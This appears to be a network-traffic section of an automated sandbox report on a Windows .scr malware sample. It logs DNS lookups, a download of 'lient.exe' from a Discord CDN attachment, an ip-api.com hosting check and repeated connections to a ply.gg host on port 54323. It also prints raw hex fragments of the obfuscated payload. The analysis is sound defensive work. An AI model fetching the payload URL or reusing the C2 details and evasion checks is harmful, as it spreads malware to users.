                      Oct 24, 2023 09:28:52.759888887 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.759912014 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759973049 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.760014057 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.764522076 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:55.168826103 CEST4971580192.168.2.5208.95.112.1
                      Oct 24, 2023 09:28:55.287955999 CEST8049715208.95.112.1192.168.2.5
                      Oct 24, 2023 09:28:55.288300037 CEST4971580192.168.2.5208.95.112.1
                      Oct 24, 2023 09:28:55.289849043 CEST4971580192.168.2.5208.95.112.1
                      Oct 24, 2023 09:28:55.394612074 CEST8049715208.95.112.1192.168.2.5
                      Oct 24, 2023 09:28:55.436570883 CEST4971580192.168.2.5208.95.112.1
                      Oct 24, 2023 09:28:58.037697077 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:28:59.030519962 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:01.030359983 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:05.030512094 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:13.030313969 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:20.267267942 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:21.280319929 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:23.280317068 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:27.191884041 CEST8049715208.95.112.1192.168.2.5
                      Oct 24, 2023 09:29:27.280306101 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:35.280266047 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:42.346967936 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:43.358426094 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:45.358378887 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:49.358347893 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:57.358325005 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:05.079020977 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:06.092757940 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:06.175199032 CEST4971380192.168.2.5162.159.135.233
                      Oct 24, 2023 09:30:08.108326912 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:12.108431101 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:20.108508110 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:29.752381086 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:30.764525890 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:32.780175924 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:36.780168056 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:44.780251026 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:54.393327951 CEST4972954323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:55.405215979 CEST4972954323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:57.405242920 CEST4972954323192.168.2.5209.25.140.229
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Oct 24, 2023 09:28:51.724133968 CEST | 50648 | 53 | 192.168.2.5 | 1.1.1.1
                      Oct 24, 2023 09:28:51.827795982 CEST | 53 | 50648 | 1.1.1.1 | 192.168.2.5
                      Oct 24, 2023 09:28:55.054267883 CEST | 64702 | 53 | 192.168.2.5 | 1.1.1.1
                      Oct 24, 2023 09:28:55.159499884 CEST | 53 | 64702 | 1.1.1.1 | 192.168.2.5
                      Oct 24, 2023 09:28:57.858885050 CEST | 64168 | 53 | 192.168.2.5 | 1.1.1.1
                      Oct 24, 2023 09:28:58.034796953 CEST | 53 | 64168 | 1.1.1.1 | 192.168.2.5

                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Oct 24, 2023 09:28:51.724133968 CEST | 192.168.2.5 | 1.1.1.1 | 0xa174 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001) | false
                      Oct 24, 2023 09:28:55.054267883 CEST | 192.168.2.5 | 1.1.1.1 | 0xb92 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                      Oct 24, 2023 09:28:57.858885050 CEST | 192.168.2.5 | 1.1.1.1 | 0xf841 | Standard query (0) | ideas-teams.at.ply.gg | A (IP address) | IN (0x0001) | false

                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Oct 24, 2023 09:28:51.827795982 CEST | 1.1.1.1 | 192.168.2.5 | 0xa174 | No error (0) | cdn.discordapp.com | | 162.159.135.233 | A (IP address) | IN (0x0001) | false
                      Oct 24, 2023 09:28:51.827795982 CEST | 1.1.1.1 | 192.168.2.5 | 0xa174 | No error (0) | cdn.discordapp.com | | 162.159.130.233 | A (IP address) | IN (0x0001) | false
                      Oct 24, 2023 09:28:51.827795982 CEST | 1.1.1.1 | 192.168.2.5 | 0xa174 | No error (0) | cdn.discordapp.com | | 162.159.134.233 | A (IP address) | IN (0x0001) | false
                      Oct 24, 2023 09:28:51.827795982 CEST | 1.1.1.1 | 192.168.2.5 | 0xa174 | No error (0) | cdn.discordapp.com | | 162.159.129.233 | A (IP address) | IN (0x0001) | false
                      Oct 24, 2023 09:28:51.827795982 CEST | 1.1.1.1 | 192.168.2.5 | 0xa174 | No error (0) | cdn.discordapp.com | | 162.159.133.233 | A (IP address) | IN (0x0001) | false
                      Oct 24, 2023 09:28:55.159499884 CEST | 1.1.1.1 | 192.168.2.5 | 0xb92 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                      Oct 24, 2023 09:28:58.034796953 CEST | 1.1.1.1 | 192.168.2.5 | 0xf841 | No error (0) | ideas-teams.at.ply.gg | | 209.25.140.229 | A (IP address) | IN (0x0001) | false
                      • cdn.discordapp.com
                      • ip-api.com
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      0 | 192.168.2.5 | 49714 | 162.159.135.233 | 443 | C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      Timestamp | kBytes transferred | Direction | Data


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      1 | 192.168.2.5 | 49713 | 162.159.135.233 | 80 | C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Oct 24, 2023 09:28:51.939522982 CEST | 0 | OUT | GET /attachments/1161633037004587060/1161731056462995496/lient.exe HTTP/1.1
                      Host: cdn.discordapp.com
                      Connection: Keep-Alive
                      Oct 24, 2023 09:28:52.062495947 CEST | 2 | IN | HTTP/1.1 301 Moved Permanently
                      Date: Tue, 24 Oct 2023 07:28:51 GMT
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Tue, 24 Oct 2023 08:28:51 GMT
                      Location: https://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                      Set-Cookie: __cf_bm=0jpx_3oF9ribyqwWLndqsJX24h1ICfR2EkRkwoK27eA-1698132531-0-Af77efxPsXVThM7VLz9J0d1R8MIB7cwDMUV72ZtK98hDwzC5BdG8pVHQGEu5oXM+ZdALNnv5P5qSZ13ZNLXNCus=; path=/; expires=Tue, 24-Oct-23 07:58:51 GMT; domain=.discordapp.com; HttpOnly
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5fQAlJnhEiK74y%2FbIsh%2Boinhy1KAGT%2FBZOywQBR3y801PlA2CfG1Y8njL8m8vcY4zWnH9XoQ4qqpllED0JKgmMMwVsN6xji1yGb4uo8kazxf0rc5SFjsEGl32%2B00iT1uGYHypA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Set-Cookie: _cfuvid=UF3BvbLAKH7ZKhiTe9FisHyzhNI9a9Quly0.L4G9frY-1698132531989-0-604800000; path=/; domain=.discordapp.com; HttpOnly
                      Server: cloudflare
                      CF-RAY: 81b08164ddf92040-IAD
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      2 | 192.168.2.5 | 49715 | 208.95.112.1 | 80 | C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      Timestamp | kBytes transferred | Direction | Data
                      Oct 24, 2023 09:28:55.289849043 CEST | 129 | OUT | GET /line/?fields=hosting HTTP/1.1
                      Host: ip-api.com
                      Connection: Keep-Alive
                      Oct 24, 2023 09:28:55.394612074 CEST | 129 | IN | HTTP/1.1 200 OK
                      Date: Tue, 24 Oct 2023 07:28:55 GMT
                      Content-Type: text/plain; charset=utf-8
                      Content-Length: 6
                      Access-Control-Allow-Origin: *
                      X-Ttl: 60
                      X-Rl: 44
                      Data Raw: 66 61 6c 73 65 0a
                      Data Ascii: false


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      0 | 192.168.2.5 | 49714 | 162.159.135.233 | 443 | C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      Timestamp | kBytes transferred | Direction | Data
                      2023-10-24 07:28:52 UTC | 0 | OUT | GET /attachments/1161633037004587060/1161731056462995496/lient.exe HTTP/1.1
                      Host: cdn.discordapp.com
                      Connection: Keep-Alive
                      2023-10-24 07:28:52 UTC | 0 | IN | HTTP/1.1 200 OK
                      Date: Tue, 24 Oct 2023 07:28:52 GMT
                      Content-Type: application/x-msdos-program
                      Content-Length: 116224
                      Connection: close
                      CF-Ray: 81b08167fc140849-IAD
                      CF-Cache-Status: MISS
                      Accept-Ranges: bytes
                      Cache-Control: public, max-age=31536000
                      Content-Disposition: attachment; filename="lient.exe"
                      ETag: "2f621d531b27ff6bcf35db5412a879bf"
                      Expires: Wed, 23 Oct 2024 07:28:52 GMT
                      Last-Modified: Wed, 11 Oct 2023 18:24:27 GMT
                      Vary: Accept-Encoding
                      Alt-Svc: h3=":443"; ma=86400
                      x-goog-generation: 1697048667865086
                      x-goog-hash: crc32c=QIBeMw==
                      x-goog-hash: md5=L2IdUxsn/2vPNdtUEqh5vw==
                      x-goog-metageneration: 1
                      x-goog-storage-class: STANDARD
                      x-goog-stored-content-encoding: identity
                      x-goog-stored-content-length: 116224
                      X-GUploader-UploadID: ABPtcPqqrM6GeKkVDcoFtyR3AN5QvzL9jxJOpzINHVDmpbf_lNTAViQL4C98Jew0R9vLU4PM5Gu6SN3bzkxH2BsDwpxKhUHufQ8z
                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                      Set-Cookie: __cf_bm=dHef9XGlLGokpPodMVTMT4szmLvfGgjq_Psl9lbx4b8-1698132532-0-AVPbzLHxFvZT3pHzjY7dwiVdt1XlPY1kjBSFHxpArouI74PEVOu1hIw23OtWi0A1nDoRLGApculPlY63r9tVWOo=; path=/; expires=Tue, 24-Oct-23 07:58:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                      2023-10-24 07:28:52 UTC23INData Raw: 2d 01 00 00 0b 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 21 00 00 11 7e 2b 00 00 04 02 6f d0 00 00 0a 26 de 14 25 28 32 00 00 0a 0a 16 80 2a 00 00 04 28 33 00 00 0a de 00 2a 00 01 10 00 00 00 00 00 00 0e 0e 00 14 27 00 00 01 1b 30 02 00 8f 00 00 00 2c 00 00 11 7e 30 00 00 04 2c 20 7e 30 00 00 04 6f d1 00 00 0a 14 80 30 00 00 04 de 0e 25 28 32 00 00 0a 0c 28 33 00 00 0a de 00 7e 2f 00 00 04 2c 2a 7e 2f 00 00 04 6f d2 00 00 0a 7e 2f 00 00 04 6f c4 00 00 0a 14 80 2f 00 00 04 de 0e 25 28 32 00 00 0a 0a 28 33 00 00 0a de 00 7e 2b 00 00 04 2c 2a 7e 2b 00 00 04 6f d3 00 00 0a 7e 2b 00 00 04 6f 70 00 00 0a 14 80 2b 00 00 04 de 0e 25 28 32 00 00 0a 0b 28 33 00 00 0a de 00 28 d4 00 00 0a 2a 00 01 28 00 00 00 00 07 00 12 19 00 0e 27 00 00 01 00 00 2e 00 1c 4a 00
                      Data Ascii: -0#!~+o&%(2*(3*'0,~0, ~0o0%(2(3~/,*~/o~/o/%(2(3~+,*~+o~+op+%(2(3(*('.J
                      2023-10-24 07:28:52 UTC24INData Raw: 16 28 50 00 00 0a 16 33 20 7e 2b 00 00 04 18 6f df 00 00 0a 7e 2b 00 00 04 6f d3 00 00 0a 16 28 9a 00 00 0a 38 64 89 00 00 11 9e 7e 27 00 00 0a 8e 20 d8 29 00 00 58 11 3d 1f 15 62 20 73 e9 ff ff 33 05 38 86 00 00 00 11 19 1f 09 62 66 11 19 20 db 11 00 00 61 20 00 02 00 00 5a 33 02 2b 0d 20 05 4f c0 ca 20 7c d6 3f 35 d6 2b 5e 11 a3 1f 11 5a 11 a3 1f 0f 5a 58 65 20 b3 ba 45 57 33 02 2b 3d 11 a3 66 20 00 00 20 00 5e 20 cb eb 03 00 5c 20 16 08 00 00 61 20 00 80 ff ff 5f 16 2e 02 2b 0e 7e 27 00 00 0a 8e 20 2a dd 57 72 58 2b 0c 7e 27 00 00 0a 8e 20 c8 b7 38 2f 58 00 2b 0b 20 cb 04 37 1a 20 dd 48 bd 2b 58 00 00 2b 0c 7e 27 00 00 0a 8e 20 e4 bf 42 79 58 00 fe 1c 43 00 00 01 1f 25 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 bf 00 00 00 7e 23 00 00 04 6f 30 00 00 06
                      Data Ascii: (P3 ~+o~+o(8d~' )X=b s38bf a Z3+ O |?5+^ZZXe EW3+=f ^ \ a _.+~' *WrX+~' 8/X+ 7 H+X+~' ByXC%X((P@~#o0
                      2023-10-24 07:28:52 UTC26INData Raw: 2e 02 2b 0d 20 68 a4 a7 ba 20 4b 05 b4 fd 61 2b 0a 23 00 00 00 00 a0 60 e4 40 b7 00 20 ec ae 00 00 d3 69 7e 27 00 00 0a 8e 20 af 00 00 00 58 28 03 00 00 06 16 8d 12 00 00 01 14 14 14 28 88 00 00 0a 28 8d 00 00 0a 7e 34 00 00 04 28 8d 00 00 0a 28 1b 00 00 06 28 8d 00 00 0a 28 56 00 00 0a 28 43 00 00 06 38 ca 83 00 00 11 9e 7e 27 00 00 0a 8e 20 0f 05 01 00 58 7e 27 00 00 0a 8e 20 bd 0f 01 00 58 20 ae f0 ff ff 11 19 1f 16 62 58 20 00 40 00 00 5a 66 11 19 20 00 01 00 00 5c 2e 02 2b 0e 7e 27 00 00 0a 8e 20 0f 70 27 94 58 2b 0c fe 1c 2d 00 00 01 20 f3 00 00 00 58 00 28 03 00 00 06 16 28 50 00 00 0a 16 33 3d 12 a2 11 6d 7b 3f 00 00 04 17 9a 28 b9 00 00 0a 11 6d 7b 3f 00 00 04 18 9a 28 b9 00 00 0a 28 e4 00 00 0a 11 a2 11 6d 7b 3f 00 00 04 19 9a 28 b9 00 00 0a 28
                      Data Ascii: .+ h Ka+#`@ i~' X(((~4((((V(C8~' X~' X bX @Zf \.+~' p'X+- X((P3=m{?(m{?((m{?((
                      2023-10-24 07:28:52 UTC27INData Raw: 20 f7 f8 ff ff 58 11 64 1f 0b 62 20 00 00 00 d8 59 20 00 00 00 08 11 64 20 00 00 01 00 5c 5a 33 05 38 2e 01 00 00 7e 11 00 00 04 13 86 11 86 20 00 04 00 00 11 86 1f 0a 64 5a 61 20 00 00 80 c4 5f 16 2e 05 38 d1 00 00 00 11 79 20 d8 45 b5 6f 5f 20 53 07 00 00 59 66 20 bd 14 00 00 61 19 5f 19 33 05 38 a3 00 00 00 11 4b 20 eb 10 00 00 5f 20 4f f3 ff ff 58 11 4b 20 86 f2 ff ff 59 33 02 2b 0e fe 1c 1f 00 00 01 20 f9 e0 1b c7 58 2b 78 20 53 11 00 00 19 7e 09 00 00 04 13 4d 11 4d 5a 11 3d 20 00 00 43 dc 5a 11 4d 5f 58 11 4d 58 20 99 00 00 00 58 61 16 33 02 2b 40 20 80 6d 0b 00 11 3d 5a 1b 64 20 be f1 ff ff 59 19 11 3d 5a 1b 11 3d 5a 58 20 e1 11 00 00 58 2e 02 2b 0e 7e 27 00 00 0a 8e 20 68 4f 71 92 58 2b 0c fe 1c 21 00 00 01 20 c7 5c 4d 8d 58 00 2b 0c 7e 27 00 00
                      Data Ascii: Xdb Y d \Z38.~ dZa _.8y Eo_ SYf a_38K _ OXK Y3+ X+x S~MMZ= CZM_XMX Xa3+@ m=Zd Y=Z=ZX X.+~' hOqX+! \MX+~'
                      2023-10-24 07:28:52 UTC28INData Raw: 1f 00 00 01 a2 11 99 14 14 28 ed 00 00 0a 38 6f 79 00 00 11 9e 7e 27 00 00 0a 8e 20 9b a0 00 00 58 11 a1 1f 0e 62 11 a1 1f 14 62 20 03 23 00 00 58 59 20 94 ad ba 4f 33 02 2b 0e 7e 27 00 00 0a 8e 20 4a ab 00 00 58 2b 0a 23 00 00 80 8c c6 0b df 41 b7 00 fe 1c 2e 00 00 01 1f 51 58 28 03 00 00 06 16 28 50 00 00 0a 16 33 17 11 6d 7b 3f 00 00 04 17 9a 16 16 15 28 ee 00 00 0a 26 38 00 79 00 00 11 9e 20 90 cd 01 00 11 a3 58 11 a3 20 ff 00 00 00 5a 58 11 a3 1f 0f 62 20 11 19 00 00 59 33 02 2b 0e fe 1c 3c 00 00 01 20 16 8f 00 00 58 2b 0c 7e 27 00 00 0a 8e 20 48 41 4d ac 58 00 20 86 96 00 00 20 14 0d 00 00 61 20 eb 06 a0 5d 20 4a 06 a0 5d da 28 03 00 00 06 16 28 50 00 00 0a 16 40 0f 03 00 00 20 ea 8b 9b 40 20 16 b6 9b 40 61 11 30 20 00 00 a0 9c 5a 20 46 db ff ff 33
                      Data Ascii: (8oy~' Xbb #XY O3+~' JX+#A.QX((P3m{?(&8y X ZXb Y3+< X+~' HAMX a ] J]((P@ @ @a0 Z F3
                      2023-10-24 07:28:52 UTC30INData Raw: 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 7e 27 00 00 0a 8e 20 93 68 00 00 58 fe 1c 28 00 00 01 20 1b 68 00 00 58 7e 27 00 00 0a 8e 1f 1f 58 28 03 00 00 06 18 8d 12 00 00 01 13 99 11 99 16 11 6d 7b 3f 00 00 04 13 23 11 23 18 13 1a 11 1a 9a a2 11 99 17 11 6d 7b 3f 00 00 04 13 08 11 08 19 13 43 11 43 9a a2 11 99 13 40 11 40 14 14 18 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 23 11 1a 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 11 3e 17 90 2c 29 11 08 11 43 11 4e 80 03 00 00 04 11 40 17 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 38 44 73 00 00 11 9e 7e 27 00 00 0a 8e 20 62 4e 00 00 58 21 2f 5e 00 00 00 00 00 00 b7 20 4f
                      Data Ascii: m{?(~' hX( hX~'X(m{?##m{?CC@@;>>>>(&>,"#@(!($(t>,)CN@(!($(t8Ds~' bNX!/^ O
                      2023-10-24 07:28:52 UTC31INData Raw: 00 00 58 fe 1c 07 00 00 01 20 af 13 00 00 58 20 00 b2 24 00 11 a3 5a 20 ca fe ff ff 60 20 ca fe ff ff 2e 02 2b 0b 7e 27 00 00 0a 8e 1f 27 58 2b 0c fe 1c 1f 00 00 01 20 c4 94 20 5c 58 00 28 03 00 00 06 18 8d 12 00 00 01 13 99 11 99 16 11 6d 7b 3f 00 00 04 13 23 11 23 18 13 1a 11 1a 9a a2 11 99 17 11 6d 7b 3f 00 00 04 13 08 11 08 19 13 43 11 43 9a a2 11 99 13 40 11 40 14 14 18 8d 3b 00 00 01 13 3e 11 3e 16 17 9c 11 3e 17 17 9c 11 3e 17 28 92 00 00 0a 26 11 3e 16 90 2c 22 11 23 11 1a 11 40 16 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 11 3e 17 90 2c 22 11 08 11 43 11 40 17 9a 28 21 00 00 0a d0 02 00 00 01 28 24 00 00 0a 28 e0 00 00 0a 74 02 00 00 01 a2 38 e3 6d 00 00 11 9e 7e 27 00 00 0a 8e 20 b0 ec 00 00 58 18 11 6b 5a
                      Data Ascii: X X $Z ` .+~''X+ \X(m{?##m{?CC@@;>>>>(&>,"#@(!($(t>,"C@(!($(t8m~' XkZ
                      2023-10-24 07:28:52 UTC32INData Raw: 02 2b 0c 21 5a 5f b2 a5 ff ff ff ff b7 2b 0c 7e 27 00 00 0a 8e 20 f9 30 00 00 58 00 00 7e 27 00 00 0a 8e 1f 1f 58 28 03 00 00 06 28 57 00 00 0a 6f a1 00 00 0a 11 41 6f f0 00 00 0a 16 6f f2 00 00 0a 11 41 6f f0 00 00 0a 16 6f f3 00 00 0a 7e 27 00 00 0a 8e 20 ab ea 00 00 58 7e 27 00 00 0a 8e 20 46 e4 00 00 58 fe 1c 20 00 00 01 1f fa 58 28 03 00 00 06 80 12 00 00 04 11 41 6f f0 00 00 0a 16 6f f4 00 00 0a 11 41 6f f0 00 00 0a 17 6f f5 00 00 0a 11 41 6f f6 00 00 0a 26 11 41 6f a3 00 00 0a de 0c 11 41 2c 07 11 41 6f 5e 00 00 0a dc de 0f 25 28 32 00 00 0a 13 87 28 33 00 00 0a de 00 73 ef 00 00 0a 28 4c 00 00 06 28 4b 00 00 06 6f f0 00 00 0a 13 0a 11 0a 7e 27 00 00 0a 8e 20 40 72 00 00 58 7e 27 00 00 0a 8e 20 fe 7b 00 00 58 20 a4 00 00 00 1f f0 58 d3 b7 28 03 00
                      Data Ascii: +!Z_+~' 0X~'X((WoAooAoo~' X~' FX X(AooAooAo&AoA,Ao^%(2(3s(L(Ko~' @rX~' {X X(
                      2023-10-24 07:28:52 UTC34INData Raw: 20 2c 8f 00 00 11 64 20 1b 05 c2 0d 59 20 00 00 c8 40 11 64 5a 1f 13 64 33 02 2b 0e 7e 27 00 00 0a 8e 20 b3 9f 00 00 58 2b 0c 7e 27 00 00 0a 8e 20 96 88 74 81 58 00 20 3d 01 00 00 11 1b 5a 20 cb dc ff ff 58 20 c3 00 00 00 11 1b 5a 58 20 d3 f1 ff ff 2e 02 2b 0e 7e 27 00 00 0a 8e 20 98 24 39 b9 58 2b 0c fe 1c 2d 00 00 01 20 9a 00 00 00 58 00 28 03 00 00 06 a2 11 23 1c 11 5d 6f 72 00 00 0a 6f 73 00 00 0a 6f 03 01 00 0a a2 11 23 1d 20 00 00 00 04 1f 18 06 5a 1e 06 5a 58 5a 20 00 00 00 e0 58 06 1c 5e 2e 02 2b 0e 7e 27 00 00 0a 8e 20 80 b8 0a 74 58 2b 0c 7e 27 00 00 0a 8e 20 2f 06 01 00 58 00 20 69 d5 21 48 20 6e cc 20 48 da 7e 27 00 00 0a 8e 1f 57 58 28 03 00 00 06 a2 11 23 28 6e 00 00 0a 13 05 de 0f 25 28 32 00 00 0a 13 21 28 33 00 00 0a de 00 06 17 d6 0a 06
                      Data Ascii: ,d Y @dZd3+~' X+~' tX =Z X ZX .+~' $9X+- X(#]oroso# ZZXZ X^.+~' tX+~' /X i!H n H~'WX(#(n%(2!(3
                      2023-10-24 07:28:52 UTC35INData Raw: 00 08 00 11 39 5a 11 39 1f 13 62 61 5f 16 2e 02 2b 0e 7e 27 00 00 0a 8e 20 6f 88 44 7a 58 2b 0c fe 1c 2e 00 00 01 20 9a f8 d2 67 58 00 2b 0c 7e 27 00 00 0a 8e 20 bd e7 00 00 58 00 2b 0c fe 1c 43 00 00 01 20 26 8b 50 73 58 00 00 2b 51 06 1a 5e 20 95 08 02 0e 61 16 33 02 2b 0c 23 00 00 00 31 ad f9 b0 41 b7 2b 36 11 07 20 00 00 80 d8 5a 65 66 1f 20 11 07 20 8d 01 00 00 5a 1f 73 11 07 5a 58 65 5a 33 02 2b 09 20 ea 88 ab 17 18 d8 2b 0c 7e 27 00 00 0a 8e 20 8a eb 37 9c 58 00 00 00 21 78 fb 00 00 00 00 00 00 69 13 9f 11 9f 11 a1 1f 19 64 20 00 60 15 01 58 11 a1 20 dc 0e 0e 0a 5e 1f 11 64 2e 02 2b 0e 7e 27 00 00 0a 8e 20 63 76 2c 7b 58 2b 58 11 79 20 ba 87 05 00 5c 20 00 00 00 c0 59 11 67 20 02 9b 30 00 5c 65 1f 40 5c 33 02 2b 0b 7e 27 00 00 0a 8e 1f 52 58 2b 2e
                      Data Ascii: 9Z9ba_.+~' oDzX+. gX+~' X+C &PsX+Q^ a3+#1A+6 Zef ZsZXeZ3+ +~' 7X!xid `X ^d.+~' cv,{X+Xy \ Yg 0\e@\3+~'RX+.
                      2023-10-24 07:28:52 UTC36INData Raw: 80 60 5f 20 01 02 00 00 33 02 2b 0e 7e 27 00 00 0a 8e 20 5b 4d 31 96 58 2b 2c 11 5c 20 00 04 00 00 5e 20 9c 6a 16 ba 2e 02 2b 0e 7e 27 00 00 0a 8e 20 92 b6 d6 93 58 2b 0c 7e 27 00 00 0a 8e 20 f3 72 49 67 58 00 00 2b 35 7e 0b 00 00 04 13 53 11 53 20 96 14 00 00 58 20 23 08 00 00 59 11 53 20 82 10 00 00 60 2e 02 2b 07 20 35 33 2f 7d 2b 0c 7e 27 00 00 0a 8e 20 c2 44 00 00 58 00 00 00 00 2b 0a 23 00 00 c0 14 d3 09 d8 c1 b7 00 7e 27 00 00 0a 8e 20 b2 58 00 00 58 7e 27 00 00 0a 8e 20 b9 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 33 4d 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 fe 1c 2e 00 00 01 20 0d 5b 00 00 58 20 5a 06 b3 4a 20 de 48 4d b5 d6 20 de 24 23 1b 20 0b dc dc e4 d6 d3 69 28 03 00 00 06 16 8d 12 00 00 01 14 14 14 17 28 92 00 00 0a 26 38 c3 58
                      Data Ascii: `_ 3+~' [M1X+,\ ^ j.+~' X+~' rIgX+5~SS X #YS `.+ 53/}+~' DX+#~' XX~' X((P3Mm{?(. [X ZJ HM $# i((&8X
                      2023-10-24 07:28:52 UTC38INData Raw: 11 58 2b 0c 7e 27 00 00 0a 8e 20 d4 5f 35 1b 58 00 2b 05 20 48 3d 00 00 00 00 7e 27 00 00 0a 8e 20 9a 00 00 00 58 28 03 00 00 06 16 28 50 00 00 0a 16 40 18 01 00 00 11 6d 7b 3f 00 00 04 17 9a 28 1e 00 00 06 14 11 2a 20 ba 87 05 00 5c 20 00 00 00 c0 59 11 7d 20 02 9b 30 00 5c 65 1f 40 5c 2e 02 2b 0e 7e 27 00 00 0a 8e 20 46 cb ae 69 58 2b 6a 11 0c 20 00 70 12 c7 59 1f 10 11 0c 20 00 00 00 40 5c 11 0c 1f 10 5c 61 5a 2e 02 2b 40 20 ee 19 00 00 11 13 20 7f 01 00 00 5a 58 11 13 20 81 02 00 00 5a 58 20 4a ff ff ff 60 1f ee 2e 02 2b 0e fe 1c 4f 00 00 01 20 01 00 90 59 58 2b 0c fe 1c 2d 00 00 01 20 7d d8 17 87 58 00 2b 0c 7e 27 00 00 0a 8e 20 af 0e 01 00 58 00 00 7e 27 00 00 0a 8e 20 7c 01 01 00 58 11 13 20 a5 05 00 00 5c 20 4b a0 00 82 58 20 ff ff ff 7f 60 15 2e
                      Data Ascii: X+~' _5X+ H=~' X((P@m{?(* \ Y} 0\e@\.+~' FiX+j pY @\\aZ.+@ ZX ZX J`.+O YX+- }X+~' X~' |X \ KX `.
